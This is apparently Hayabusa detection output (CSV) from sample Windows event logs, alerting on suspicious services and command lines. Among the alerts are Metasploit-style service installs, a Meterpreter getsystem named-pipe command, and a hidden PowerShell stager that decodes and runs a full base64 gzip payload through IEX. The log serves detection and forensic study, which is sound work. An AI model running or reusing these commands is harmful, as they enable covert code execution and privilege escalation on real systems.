C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:52.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:52.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:53.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:57.149 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe 
C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceaf,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:59.915 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:56:34.967 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:56:34.999 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:58:48.497 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:58:48.512 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,info,,New Service Installed,Name: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:00:43.879 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:00:43.910 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,info,,New Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,info,,New Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:08:53.832 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly 
Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,info,,New Service Installed,Name: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: 
%SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,info,,New Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,info,,New Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:16:40.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,info,,New Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: 
%SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,info,,New Service Installed,Name: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c 
start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c 
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04X
pi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 06:05:56.876 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 06:06:09.220 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 06:06:09.236 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 